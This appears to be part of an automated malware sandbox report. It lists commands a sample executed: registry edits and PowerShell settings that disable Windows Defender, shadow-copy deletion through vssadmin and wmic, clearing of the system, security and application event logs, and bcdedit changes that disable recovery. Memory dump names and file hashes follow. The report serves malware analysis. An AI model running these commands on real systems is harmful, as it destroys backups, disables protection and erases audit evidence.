reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Files

memory/3284-130-0x0000000000000000-mapping.dmp

memory/1456-131-0x0000000000000000-mapping.dmp

memory/3200-132-0x0000000000000000-mapping.dmp

memory/464-133-0x0000000000000000-mapping.dmp

memory/1972-134-0x0000000000000000-mapping.dmp

memory/4128-135-0x0000000000000000-mapping.dmp

memory/4284-136-0x0000000000000000-mapping.dmp

memory/4496-137-0x0000000000000000-mapping.dmp

memory/2392-138-0x0000000000000000-mapping.dmp

memory/3308-139-0x0000000000000000-mapping.dmp

memory/2176-140-0x0000000000000000-mapping.dmp

memory/4184-141-0x0000000000000000-mapping.dmp

memory/4940-142-0x0000000000000000-mapping.dmp

memory/1348-143-0x0000000000000000-mapping.dmp

memory/1324-144-0x0000000000000000-mapping.dmp

memory/2980-145-0x0000000000000000-mapping.dmp

memory/4768-146-0x0000000000000000-mapping.dmp

memory/4944-147-0x0000000000000000-mapping.dmp

memory/4860-148-0x0000000000000000-mapping.dmp

memory/228-149-0x0000000000000000-mapping.dmp

memory/1844-150-0x0000000000000000-mapping.dmp

memory/3348-151-0x0000000000000000-mapping.dmp

memory/4404-152-0x0000000000000000-mapping.dmp

memory/2044-153-0x0000000000000000-mapping.dmp

memory/1328-154-0x0000000000000000-mapping.dmp

memory/3500-155-0x0000000000000000-mapping.dmp

memory/908-156-0x0000000000000000-mapping.dmp

memory/2972-157-0x0000000000000000-mapping.dmp

memory/1048-158-0x0000000000000000-mapping.dmp

memory/2984-159-0x0000000000000000-mapping.dmp

memory/3544-160-0x0000000000000000-mapping.dmp

memory/4044-161-0x0000000000000000-mapping.dmp

memory/4168-162-0x0000000000000000-mapping.dmp

memory/4156-163-0x0000000000000000-mapping.dmp

memory/2772-164-0x0000000000000000-mapping.dmp

memory/4452-165-0x0000000000000000-mapping.dmp

memory/1708-166-0x0000000000000000-mapping.dmp

memory/1556-167-0x0000000000000000-mapping.dmp

memory/4376-168-0x0000000000000000-mapping.dmp

memory/4568-169-0x0000000000000000-mapping.dmp

memory/4036-170-0x0000000000000000-mapping.dmp

memory/3188-171-0x0000000000000000-mapping.dmp

memory/1404-172-0x0000000000000000-mapping.dmp

memory/1940-173-0x0000000000000000-mapping.dmp

memory/3460-174-0x0000000000000000-mapping.dmp

memory/4928-175-0x0000000000000000-mapping.dmp

memory/4268-176-0x0000000000000000-mapping.dmp

memory/4416-177-0x0000000000000000-mapping.dmp

memory/5056-178-0x0000000000000000-mapping.dmp

memory/3132-179-0x0000000000000000-mapping.dmp

memory/4492-180-0x0000000000000000-mapping.dmp

memory/2840-181-0x0000000000000000-mapping.dmp

memory/5116-182-0x0000000000000000-mapping.dmp

memory/3856-183-0x0000000000000000-mapping.dmp

memory/1936-184-0x0000000000000000-mapping.dmp

memory/64-185-0x0000000000000000-mapping.dmp

memory/3660-186-0x0000000000000000-mapping.dmp

memory/3752-187-0x0000000000000000-mapping.dmp

memory/1304-188-0x0000000000000000-mapping.dmp

memory/1864-189-0x0000000000000000-mapping.dmp

memory/1228-190-0x0000000000000000-mapping.dmp

memory/4128-191-0x0000000000000000-mapping.dmp

memory/2596-192-0x0000000000000000-mapping.dmp

memory/4780-193-0x0000000000000000-mapping.dmp

memory/828-194-0x0000029450000000-0x0000029450022000-memory.dmp

memory/828-196-0x0000029450053000-0x0000029450055000-memory.dmp

memory/828-195-0x0000029450050000-0x0000029450052000-memory.dmp

memory/828-197-0x0000029450056000-0x0000029450058000-memory.dmp

memory/828-198-0x00007FFF79620000-0x00007FFF7A0E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 59d97011e091004eaffb9816aa0b9abd
SHA1 1602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA256 18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512 d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

memory/1036-201-0x00007FFF79620000-0x00007FFF7A0E1000-memory.dmp

memory/1036-202-0x0000025979850000-0x0000025979852000-memory.dmp